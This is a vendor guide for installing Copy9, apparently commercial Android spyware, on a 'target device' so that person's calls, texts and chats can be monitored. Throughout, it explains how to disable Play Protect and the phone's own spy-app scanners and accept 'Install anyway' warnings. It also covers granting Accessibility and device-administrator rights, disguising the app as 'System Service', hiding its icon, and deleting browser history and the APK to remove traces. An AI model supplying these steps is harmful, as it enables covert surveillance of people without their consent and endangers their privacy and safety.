This guide will walk you through installing Copy9 on Android devices. First, ensure you have the welcome email from Copy9 with your login details and the device you wish to install Copy9 on. For added convenience, you can opt for C9’s Remote Installation Support, where a technical expert will handle the download and installation for you.
The Copy9 app is fully compatible with Android versions 5.x to 11.x, offering high-quality MP3 call recording and more. The current version, 7.86 (released in August 2024), supports all features listed on our Features page. To install the app, you’ll need to have the target device in hand.

Click the button Download Copy9 below and accept the terms and conditions of us to download it.
If you want to install apps on the target device, you must Disable Play Protect. Follow each step below.
Open “Play Store” -> Tap on “Play Protect” -> Uncheck “Scan apps with Play Protect”
Don’t worry, this actions won’t harm your target device! But these simple steps will activate Copy9 on your target device and you will start receiving information to your dashboard immediately!
This is to avoid warnings which may otherwise randomly appear. Disabling Notifications does not disable Play Store or prevent normal app updates.
Step 1: Open Settings -> Click Notification
Step 2: Turn Off Google Play Store
For Xiaomi and Redmi devices: Before installing the Copy9 app, the phone Security app will scan through to check if it is a spy application or not. It will then automatically uninstall to avoid phone spying. So we need to turn off the Scan before installing feature before installs to be able to install Copy9.
You can disable it by following the steps:
1. Open Security app
2. Seclect icon Setting (in the top right corner)
3. Scroll down and click on Security scan
4. Disable Scan before installing
Browse to android.copy9.com from your target device’s browser and download Copy9 App to your target device. When the download is complete please open your notification window and install it from there.
Note: Once you have downloaded the APK of Copy9 application, please install it step by step as given below so that the application can run perfectly in the target device.
Step 1. Enter the password 1234 to confirm downloading the application
Step 2. Click button Download and Click OK and accept download
Step 3. Click Open to install the application
Run the application and follow the steps. The app is called “System Service” to be more stealthy. If you have this message it means that you haven’t disabled the verification of applications. See step 1.2 or click “Install Anyway”.
When you install Copy9, your device will prompt all the permissions the app needs to be installed. We have separate instructions for each type of device so you can see the installation guide that matches the name of the target device.
Step 4. Click Settings (from Chrome Popup)
Step 5. If a popup appears Blocked by Play Protect, click choose Install anyway.

6. Turn on Copy9 Notification Access
If you want monitor Silent and Undetectable, click “Hide Icon Copy9”. In order to show interface again you should make a call with number #1234*
Step 4. Click Settings (from Chrome Popup)
Step 5. Turn On “Allow from this source”
If a popup appears Blocked by Play Protect, click choose OK.

After you have enabled all the permissions required by the application, click “Next” to proceed with the login.
Note: You need to disable the following features of the Phone Manager app in order for the Copy9 app to work properly on the target user’s device.
1. Long press the icon of the Phone Manager app. Then click App info.
2. Click Manage notifications.
3. Turn off Allow notifications.
1. Click open Phone Manager app.
2. Click icon Settings (top right corner).
3. Click turn off Self-Check.
4. Check turn off.
5. Click Auto Update of Phone Manager.
6. Check turn off.
1. Click open Phone Manager app.
2. Click Payment Protection.
3. Turn off all app Guarded.
In order to clean all traces you should clean history browser and you should clear downloaded file (Copy9.APK file) at Downloads. Sometime it does not work immediately so you should restart your device once.
Step 4. Click Settings (from Chrome Popup)
5. If the Turn on Play Protect ? dialog box is displayed when installing, choose to DECLINE.

3. Select Downloaded services
4. Turn on Accessibility (Provided by System Services)
5. Click Turn on
6. Click button Allow
1. Click the Accept button to enable Device Administrator permission
2. Select Activate this device admin app
3. Click the Next step button to finish enabling the Device Administrator function

After you have enabled all the permissions required by the application, click “Next” to proceed with the login.
Enabled Auto Start for Copy9 application
If you have not enabled Auto Start for Copy9 application during installation, you can enable it according to this guide so that the application can run in the background well.
Open Application Security -> Go to Permission -> AutoStart -> Enable “System Service”.
Note: After you have enabled AutoStart for “System Service” app, please reboot to get the app to start running (For Xiaomi & Redmi)
Delete all history on Chrome/Firefox.
Delete Copy9.apk from My File -> Downloads
Go to my.copy9.com -> Log in to your account and start monitoring all the calls, texts, IM chats, etc.
